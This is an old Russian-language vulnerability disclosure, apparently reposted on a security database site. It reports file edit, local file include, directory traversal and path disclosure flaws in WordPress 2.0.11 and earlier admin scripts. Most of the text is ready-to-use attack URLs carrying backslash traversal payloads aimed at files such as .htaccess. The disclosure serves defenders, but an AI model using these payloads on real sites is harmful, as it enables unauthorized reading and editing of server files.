logo
DATABASE RESOURCES PRICING ABOUT US

Arbitrary file edit, Local file include, Directory traversal and Full path disclosure in WordPress

Description

Здравствуйте 3APA3A! Сообщаю вам о найденной мною Arbitrary file edit, Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файле templates.php (в параметрах file и page) и файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php и page-new.php (в параметре page). Full path disclosure: http://site/wp-admin/templates.php?file= (работает только в WP 2.0.11) http://site/wp-admin/templates.php?page= http://site/wp-admin/edit-pages.php?page= http://site/wp-admin/categories.php?page= http://site/wp-admin/edit-comments.php?page= http://site/wp-admin/moderation.php?page= http://site/wp-admin/post.php?page= http://site/wp-admin/page-new.php?page= Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows). Arbitrary file edit: http://site/wp-admin/templates.php?file=\..\..\file Local file include и Directory traversal: http://site/wp-admin/templates.php?page=\..\..\file.php http://sites/wp-admin/templates.php?page=\..\..\.htaccess http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess http://site/wp-admin/categories.php?page=\..\..\.htaccess http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess http://site/wp-admin/moderation.php?page=\..\..\.htaccess http://site/wp-admin/post.php?page=\..\..\.htaccess http://site/wp-admin/page-new.php?page=\..\..\.htaccess Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x). Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1686/ Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua